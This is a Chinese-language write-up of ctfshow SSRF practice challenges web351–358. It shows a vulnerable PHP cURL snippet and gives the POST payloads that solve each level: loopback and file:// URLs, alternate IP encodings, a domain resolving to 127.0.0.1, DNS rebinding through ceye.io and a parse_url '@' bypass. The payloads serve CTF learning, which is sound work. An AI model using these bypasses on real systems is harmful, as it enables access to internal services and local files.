【Web】Ctfshow SSRF刷题记录1
核心代码解读
<?php
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
?>
curl_init():初始curl会话
curl_setopt():会话设置
curl_exec():执行curl会话,获取内容
curl_close():会话关闭
①web351
post:
url=http://127.0.0.1/flag.php
或者
url=file:///var/www/html/flag.php
查看源码
②web352-353
前置知识:
127.1会被解析成127.0.0.1,也就意味着为零可缺省
在Linux中,0也会被解析成127.0.0.1
127.0.0.0/8是一个环回地址网段,从127.0.0.1 ~ 127.255.255.254都表示localhost
ip地址还可以通过表示成其他进制的形式访问,IP地址二进制、十进制、十六进制互换
post:
url=http://0/flag.php
url=http://127.1/flag.php
url=http://0x7f.0.0.1/flag.php
url=http://0x7F000001/flag.php
③web354
一些公共域名,但是解析到127.0.0.1
post:
url=http://ecd.tencent.com/flag.php
(当我们访问域名时会把我们引入设置的A记录,这里就是127.0.0.1,感觉就像给域名重起了个名字)
⑤web355-356
也就是长度限制
post:
url=http://0/flag.php
⑥web357
FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP
FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP
FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP (比如 192.168.0.1)
FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。
因为代码中使用了 gethostbyname 获取了真实 IP 地址,所以域名指向方法不能再使用,可以使用 302 跳转方法 和 dns rebinding 方法。
DNS rebinding(DNS重新绑定攻击)
攻击重点在于DNS服务能够在两次DNS查询中返回不同的IP地址,第一次是真正的IP,第二次是攻击目标IP地址,甚至可以通过这种攻击方法绕过同源策略。
回到题目,在题目代码中一共对域名进行了两次请求,第一次是 gethostbyname 方法,第二次则是 file_get_contents 文件读取,可以通过 DNS重绑定 来实现攻击。
去CEYE 注册账号,在个人信息页面,点击下面的+ New DNS,添加127.0.0.1和124.222.136.33(随便一个可用的ip)。
翻阅ceye的DNS Rebinding页面的介绍,有这么一句话:
If your identifier is abcdef.ceye.io, then your DNS rebinding host is r.abcdef.ceye.io.
所以要使用DNS重定向,我们要在域名前面加上r.
多试几次即可(每次都是随机返回一个设置的IP,所以可能大概率碰运气)
⑦web358
正则,必须要以http://ctf.
开头,以show结尾
当parse_url()
解析到邮箱时:@前是user
file_get_contents()
会访问host:port/path
,与user无关
post:
url=http://ctf.@127.0.0.1/flag.php#show
还有两题后续专门总结